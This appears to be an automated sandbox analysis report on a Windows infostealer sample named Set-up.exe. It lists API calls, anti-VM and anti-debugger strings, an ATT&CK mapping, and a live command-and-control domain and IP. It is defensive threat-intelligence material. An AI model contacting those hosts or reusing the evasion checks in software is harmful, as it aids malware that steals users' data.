Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00C4F5B0	0_2_00C4F5B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DB56D0	0_2_00DB56D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DDB6F0	0_2_00DDB6F0

Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00AA5340 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00A675A0 appears 413 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00B79720 appears 31 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00C3CA40 appears 73 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00A671E0 appears 34 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00C17220 appears 659 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00B444A0 appears 64 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00AA4F40 appears 222 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00C17120 appears 45 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00AA4FD0 appears 157 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00A673F0 appears 78 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00C3CBC0 appears 397 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00C3A170 appears 40 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00C17310 appears 41 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00A6CAA0 appears 41 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00AA50A0 appears 35 times
Source: C:\Users\user\Desktop\Set-up.exe	Code function: String function: 00C3C9B0 appears 70 times

Source: Set-up.exe

Static PE information: invalid certificate

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: Set-up.exe

Binary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd

Source: classification engine

Classification label: mal68.troj.spyw.evad.winEXE@1/0@8/2

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00A7D090 GetLastError,_errno,__sys_nerr,__sys_errlist,FormatMessageW,wcstombs,strchr,strlen,strcpy,strrchr,strrchr,_errno,GetLastError,SetLastError,_errno,_errno,GetLastError,

0_2_00A7D090

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00A6255D

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00A629FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,

0_2_00A629FF

Source: C:\Users\user\Desktop\Set-up.exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Set-up.exe

ReversingLabs: Detection: 26%

Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: in-addr.arpa
Source: Set-up.exe	String found in binary or memory: t xml:space=.gif" border="0"</body> </html> overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script> /favicon.ico" />operating system" style="width:1target="_blank">State Universitytext-align:left; document.write(, including the around t
Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectorysystem_win32.c@
Source: Set-up.exe	String found in binary or memory: in-addr.arpa
Source: Set-up.exe	String found in binary or memory: 8L0123456789abcdefin-addr.arpaip6.arpa
Source: Set-up.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: Set-up.exe	String found in binary or memory: JM[\Unable to allocate space for channel dataFailed allocating memory for channel type nameUnable to allocate temporary space for packetWould block sending channel-open requestUnable to send channel-open requestWould blockUnexpected errorUnexpected packet sizeChannel open failure (administratively prohibited)Channel open failure (connect failed)Channel open failure (unknown channel type)Channel open failure (resource shortage)Channel open failureUnable to allocate memory for setenv packetcancel-tcpip-forwardWould block sending forward requestUnable to send global-request packet for forward listen requestauth-agent-req@openssh.comauth-agent-reqcdChannel can not be reusedUnable to allocate memory for channel-process requestWould block sending channel requestUnable to send channel requestFailed waiting for channel successUnable to complete request for channel-process-startupUnexpected packet lengthUnable to allocate memory for signal nameWould block sending window adjustUnable to send transfer-window adjustment packet, deferringtransport readwould blockWe have already closed this channelEOF has already been received, data might be ignoredFailure while draining incoming flowUnable to send channel dataUnable to send EOF, but closing channel anywayWould block sending close-channelUnable to send close-channel request, but closing anywaysessionchannel.cUnable to allocate memory for direct-tcpip connectiondirect-tcpipUnable to allocate memory for direct-streamlocal connectiondirect-streamlocal@openssh.comQR0.0.0.0tcpip-forwardWould block sending global-request packet for forward listen requestUnknownUnable to allocate memory for listener queueUnable to complete request for forward-listenWould block waiting for packetChannel not foundcdenvWould block sending setenv requestUnable to send channel-request packet for setenv requestFailed getting response for channel-setenvUnable to complete request for channel-setenvcdWould block sending auth-agent requestUnable to send auth-agent requestFailed to request auth-agentUnable to complete request for auth-agentcdterm + mode lengths too largepty-reqWould block sending pty requestUnable to send pty-request packetFailed to require the PTY packageUnable to complete request for channel request-ptywindow-changeWould block sending window-change requestUnable to send window-change packetcdUnable to allocate memory for pty-requestx11-reqMIT-MAGIC-COOKIE-1Unable to get random bytes for x11-req cookie%02XWould block sending X11-req packetUnable to send x11-req packetwaiting for x11-req response packetUnable to complete request for channel x11-reqWould block sending EOFUnable to send EOF on channelReceiving channel window has been exhausted_libssh2_transport_read() bailed out!libssh2_channel_wait_closed() invoked when channel is not in EOF stateUnable to allocate memory for signal requestsignalWould block sending signal requestUnable to send signal packetecdsa-sha2-nistp256ecdsa-sha2-nistp384ecdsa-sha2-nistp521blocksize <= siz
Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 7101064 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x4e5c00
Source: Set-up.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x151c00

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00DF8D9A LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,FreeLibrary,__acrt_iob_func,fwrite,

0_2_00DF8D9A

Source: Set-up.exe

Static PE information: section name: .eh_fram

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00DE41D0 push eax; mov dword ptr [esp], edx	0_2_00DE41D5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00C80300 push eax; mov dword ptr [esp], 00000000h	0_2_00C80305
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00ADC6D0 push eax; mov dword ptr [esp], edx	0_2_00ADC6D5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B08640 push eax; mov dword ptr [esp], edx	0_2_00B08645
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B1C7F0 push eax; mov dword ptr [esp], 00000000h	0_2_00B1C743
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00AA0AC0 push eax; mov dword ptr [esp], 00000000h	0_2_00AA0AC4
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00BC1130 push eax; mov dword ptr [esp], edx	0_2_00BC1135
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00AC1430 push eax; mov dword ptr [esp], 00000000h	0_2_00AC1433

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\Desktop\Set-up.exe

Code function: C:\Windows\System32\VBox*.dll vbox_first SYSTEM\ControlSet001\Services\VBoxSF vbox_second

0_2_00A629FF

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Set-up.exe	Binary or memory string: PROCMON.EXE
Source: Set-up.exe	Binary or memory string: X64DBG.EXE
Source: Set-up.exe	Binary or memory string: WINDBG.EXE
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Set-up.exe	Binary or memory string: WIRESHARK.EXE

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00A629FF

Source: C:\Users\user\Desktop\Set-up.exe

API coverage: 7.9 %

Source: C:\Users\user\Desktop\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A6255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,	0_2_00A6255D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A629FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,	0_2_00A629FF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00C3E270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,	0_2_00C3E270

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00A6255D

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00A6255D

Source: Set-up.exe	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Set-up.exe	Binary or memory string: Hyper-V RAW
Source: Set-up.exe	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Set-up.exe, 00000000.00000003.1693512954.00000000006F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
Source: Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793963248.000000000140B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795591258.000000000140C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Set-up.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00A629FF

Source: C:\Users\user\Desktop\Set-up.exe

0_2_00DF8D9A

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A6116C Sleep,Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	0_2_00A6116C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A611A3 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,	0_2_00A611A3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A61160 Sleep,SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,	0_2_00A61160
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A613C9 SetUnhandledExceptionFilter,_set_invalid_parameter_handler,__p__acmdln,malloc,strlen,malloc,memcpy,_initterm,	0_2_00A613C9

Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00C493D0 GetSystemTime,SystemTimeToFileTime,

0_2_00C493D0

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_00F3C070 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,

0_2_00F3C070

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Set-up.exe, Set-up.exe, 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: procmon.exe
Source: Set-up.exe, Set-up.exe, 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 194.87.58.155:80

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00A9A550 setsockopt,_errno,_errno,_errno,_errno,setsockopt,WSAGetLastError,getsockopt,setsockopt,strlen,htons,getsockopt,setsockopt,WSAGetLastError,WSAGetLastError,strchr,htons,bind,WSAGetLastError,htons,bind,WSAGetLastError,htons,strtoul,	0_2_00A9A550
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00B2AA30 htons,htons,socket,ioctlsocket,setsockopt,setsockopt,htonl,bind,setsockopt,setsockopt,connect,WSAGetLastError,closesocket,	0_2_00B2AA30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_00AAE480 strlen,strchr,strchr,strchr,strtoul,strchr,strtoul,memcpy,getsockname,WSAGetLastError,WSAGetLastError,memcpy,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,bind,htons,bind,WSAGetLastError,getsockname,listen,listen,WSAGetLastError,htons,	0_2_00AAE480

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	12 Process Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	17 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Set-up.exe	26%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq17355787165a1	0%	Avira URL Cloud	safe
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716	0%	Avira URL Cloud	safe
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716fd4	0%	Avira URL Cloud	safe
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716http://home.eleventj11vt.top/jQURilAbAxjh	0%	Avira URL Cloud	safe
http://home.eleventj11vt.top/jQ3	0%	Avira URL Cloud	safe
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716?argument=0	0%	Avira URL Cloud	safe
http://home.eleventj11vt.top/jQ	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.eleventj11vt.top	194.87.58.155	true	true		unknown
httpbin.org	52.202.253.164	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716	true	Avira URL Cloud: safe	unknown
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716?argument=0	true	Avira URL Cloud: safe	unknown
https://httpbin.org/ip	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	Set-up.exe	false		high
http://html4/loose.dtd	Set-up.exe	false		high
http://home.eleventj11vt.top/jQ3	Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793963248.000000000140B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795591258.000000000140C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716fd4	Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795571963.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq1735578716http://home.eleventj11vt.top/jQURilAbAxjh	Set-up.exe, 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://httpbin.org/ipbefore	Set-up.exe	false		high
https://curl.se/docs/http-cookies.html	Set-up.exe	false		high
https://curl.se/docs/hsts.html#	Set-up.exe	false		high
http://home.eleventj11vt.top/jQ	Set-up.exe, Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793963248.000000000140B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795591258.000000000140C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.eleventj11vt.top/jQURilAbAxjhrGAaBiUq17355787165a1	Set-up.exe, 00000000.00000003.1793675979.00000000013ED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1795571963.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793748047.00000000013F6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1793878281.00000000013F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html	Set-up.exe	false		high
http://.css	Set-up.exe	false		high
http://.jpg	Set-up.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
52.202.253.164	httpbin.org	United States		14618	AMAZON-AESUS	false
194.87.58.155	home.eleventj11vt.top	Russian Federation		2118	RELCOM-ASRelcomGroup19022019RU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582587
Start date and time:	2024-12-31 00:32:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal68.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 85% Number of executed functions: 51 Number of non-executed functions: 157
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): SIHClient.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Set-up.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.87.58.155	Set-up.exe	Get hash	malicious	Unknown	Browse	home.eleventh11vs.top/MTLObSmOhYIfQKgEYuXW1735556847

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	Set-up.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	Set-up.exe	Get hash	malicious	Unknown	Browse	52.73.63.247
	a2mNMrPxow.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	FIyDwZM4OR.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	ZFttiy4Tt8.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	e62iSl0abZ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	HGFSqmKwd5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	A3nofpjN9A.exe	Get hash	malicious	Unknown	Browse	3.218.7.103

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	kwari.mips.elf	Get hash	malicious	Unknown	Browse	54.226.65.111
	Set-up.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
